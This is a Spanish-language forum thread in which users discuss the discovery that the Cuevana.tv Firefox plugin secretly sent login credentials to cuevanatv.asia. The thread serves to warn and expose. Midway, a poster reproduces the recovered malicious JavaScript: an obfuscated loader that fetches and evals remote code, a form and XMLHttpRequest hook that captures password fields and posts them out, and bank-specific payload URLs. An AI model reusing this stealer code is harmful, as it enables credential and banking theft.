Parece que esto salio ayer en foroCoches.
Yo hace banda que no entro a cuevana, pero aca deben haber varios que entran re seguido.


http://www.forocoches.com/foro/showthread.php?t=2923803


Para los que no tengan ganas de leerse todo el coso, basicamente el resumen es:

Cita:TOCHO RESUMEN:

Descubro que el plugin de CUEVANA.TV está enviando todos los datos de usuario y contraseña de todas las páginas web al dominio cuevanatv.asia/add.php, varios foreros se unen y entre todos descubrimos los scripts maliciosos y los recopilamos aquí, además descubrimos 3 scripts que supuestamente tienen relación con el robo de datos de bancarios del santander mexicano, banco de venezuela y scotiabank, otros foreros descomprimen el plugin y dan con la dirección del script malicioso que estaba robando los datos, el cual también está recopilado aquí, pasa un tiempo y la noticia se difunde por Twitter y Menéame, después ocurre lo más flipante de todo, el dominio cuevanatv.asia deja de existir, o está caído, la empresa de hosting no dice nada, cuevana.tv actualiza su plugin de Firefox pero manteniendo la misma versión (para simular que no lo han actualizado), el forero chico2009 se da cuenta de que el checksum MD5 del supuesto mismo plugin, no coincide con el checksum del plugin infectado (el cual guarda en su pc) (el checksum es una cadena de texto generada a partir de los datos binarios de un programa, asi explicado a modo rapido) esto quiere decir, que la nueva version del plugin de cuevana, a pesar de que ellos intentan simular que es la misma, NO LA ES, dado que los checksum no coinciden, de nuevo varios foreros descomprimen el nuevo plugin de cuevana y se dan cuentan de que el código malicioso está desaparecido, pero aun no ha acabado todo, el forero chico2009 guardó el plugin antiguo y lo ha subido, de este modo tenemos todos los datos posibles recopilados, es hora de pasar a la acción, JUSTICIA !!!!


lo acabo de descubrir, he buscado info. en google y no aparece nada, todo el mundo sabe que para utilizar el sitio web cuevana.tv te piden descargar un plugin, pues estaba haciendo unas cosillas y utilizando un plugin de firefox llamado tamper data he podido ver que el plugin de cuevana bypassea los formularios de entrada (usuario/contraseña) y los envía a sus servidores, después de hacer esto el formulario se envía normalmente a la página en la que estás y no notas nada, al desinstalar el plugin he podido comprobar como esto no sucedía, y al instalarlo de nuevo he comprobado de nuevo como SÍ sucedía, la prueba está aquí:

logueándome a GMAIL

No es una joda porque Cuevana ya lo ha reconocido, aunque dijeron que fue "alguien de afuera"

Para mas info, recomiendo lean el tredt del link, sino copypastear se complica.

Basicamente, con el plug-in de Cuevana, cada vez que llenabas el formulario en una pagina el script enviaba la informacion a otra pagina (por ej, contraseñas y eso) y luego te redirigia normalmente, a la pagina que estabas, y no te das cuenta. Por lo que hay que eliminar el plug-in y cambiar contraseñas

no.

pero por las dudos sumo posts como hace gonnza.


pd. alguien usa cuevana? se me hace imposible, para lo unico que entre una vez es para bajar malcolm in the middle en calidad decente (ya que por torrent solo se consigue en 120p , te sangran los ojos si intentas ver eso).

yo no la uso hace bastaaaaaaante
pero se de gente que la hace, asique..


pensa que si tenias el plug in, entraste a cuevana, y al os 3 dias entraste a tu cuenta del banco por internet, tienen tu clave
o si te logueaste con tu mail
o si usaste tarjeta de credito
y banda de cosas

Justamente fue por ese plugin de mierda que deje de usar cuevana. Menos mal.

Que tan posta es? No asustes al pedo gonza, yo uso cuevana a bases semi-regulares.

rulo: segun lei, es posta posta

leete el topic

habia links del twitter oficial de cuevana por ahi

---

Cita:Cuevana ‏@Cuevana
A usuarios que instalaron el plugin de Firefox en las últimas 2 semanas, les aconsejamos cambiar todas sus contraseñas web por precaucion.

---

Cita:Cuevana ‏@Cuevana
Algunas sospechas apuntan a que si instalaste el plugin de Firefox de Cuevana en este mes de Septiembre, el mismo pueda estar infectado.

lo que no se entiende es si lo instalaste hace banda
se actualiza solo al entrar a cuevana?

teshible, muy heavy eso

LPM... ya me parecia que algo raro pasaba con ese plugin

el script malicioso:

es un quilombo de javascript
pero las partes que encontre que son "sensibles" parece:

Cita:eval(function(p,a,c,k,e,d){e=function©{return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e©+'\\b','g'),k[c])}}return p}('6 0=7 5();0.4(\'1\',\'2://3.8/h.9?\'+g.e(),d);0.a(b);c(0.f);',18,18,'r|GET|http|cuevanatv|open|XMLHttpRequest|var|new|asia|js|send|null|eval|false|random|responseText|Math|back3'.s​plit('|'),0,{}))

que se traduce a

Cita:var r=new XMLHttpRequest();
r.open('GET','http://cuevanatv.asia/back3.js?'+Math.random(),false);
r.send(null);
eval(r.responseText);

Cita:var r = new XMLHttpRequest(); r.open('GET', "http://cuevanatv.asia/scripts.txt", false); r.send(null); if (r.status == 200) eval(r.responseText); OSid = Components.classes['@mozilla.org/xre/app-info;1'].getService(Components.interfaces.nsIXULRuntime).O S; OSid = (OSid=='Darwin')?3(OSid=='WINNT' )?2(OSid=='Linux')?1:0)); function _sData(datos, url) { var r = new XMLHttpRequest; r.open("POST", "http://cuevanatv.asia/add.php", true); r.setRequestHeader("Content-type", "application/x-www-form-urlencoded"); r.send("d="+datos+"&o="+OSid+"&u="+url); } Components.classes["@mozilla.org/observer-service;1"].getService(Components.interfaces.nsIObserverServi ce).addObserver({ observe : function(aWindow, aTopic, aData) { if (aWindow instanceof Ci.nsIDOMWindow && aTopic == 'content-document-global-created') { var win = aWindow.wrappedJSObject; win.addEventListener("submit", function(e) { datos = []; enviar = false; for each(i in e.target.elements) { if(i.type=='password') enviar=true; if(i.type!='hidden' && i.type!='submit' && i.type!=undefined) datos.push(i.name+"::"+i.value); } if(enviar) _sData(datos.join(":_:"), win.location.href); } ,false); var xmlhr = new Object(); xmlhr.open = win.XMLHttpRequest.prototype.open; xmlhr.send = win.XMLHttpRequest.prototype.send; if (win.location.host.indexOf("facebook.com")==-1) { win.XMLHttpRequest.prototype.open=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.open.apply(this, arguments); xmlhr.metodo = a.toLowerCase(); xmlhr.url = b; if(xmlhr.metodo=='get') xmlhr.datos = b.split("?")[1]; } win.XMLHttpRequest.prototype.send=function(a,b){ a=(!a)?'':a; b=(!b)?'':b; xmlhr.send.apply(this, arguments); if(xmlhr.metodo=='post') xmlhr.datos = a; xmlhr.callback(); } } xmlhr.callback = function(){ enviar = false; activadores = ["pass", "pss", "clave", "contra"]; for each(dato in this.datos.split("&")) { for each(activador in activadores) { if(dato.split("=")[0].indexOf(activador)>-1) enviar=true; } } if(enviar) _sData(this.datos.split("&").join(":_:").split("=" ).join("::"), win.location.href); } win.addEventListener("DOMContentLoaded", function(e){ for(site in scripts) { if (win.location.host.indexOf(site)>-1) { var r = new XMLHttpRequest(); r.open('GET', scripts[site], false); r.send(null); if (r.status == 200) eval(r.responseText); } } },false); } } }, 'content-document-global-created', false);

y

Cita:var scripts = { 'santander.com.mx':'http://cuevanatv.asia/plugin.js', 'banvenez.com':'http://cuevanatv.asia/plugin1.js', 'scotiaweb.com.mx':'http://cuevanatv.asia/plugin2.js' }

Estos son 3 casos particulares del script generico, o algo asi lei, para esos 3 bancos, pero een realidad el/los otros funcionan para todos los sitios

---

algun capo de javascript que bata la posta

---

ese sscript es de firefox, de chrome no lo vi aun

Esto les pasa por no usar torrent, streamingfags

viva thepiratebay

p2p ftw.

No deja de ser algo demasiado malo para Cuevana. De ser interno, porque son unos cualquieras

De no ser interno, es porque están vulnerables y no tienen la suficiente seguridad en su sitio

Yo tampoco lo uso hace milenios; de hecho tengo una versión vieja del plug-in

Off-topic:

Gonza, que hacias en forocoches?

Heavy. Por eso las operaciones del banco hay que hacerlas siempre usando el "modo incognito" o algo asi

Off-topic:

En realidad salió publicado en el blog segu-info
Y de ahí te dirige a forocoches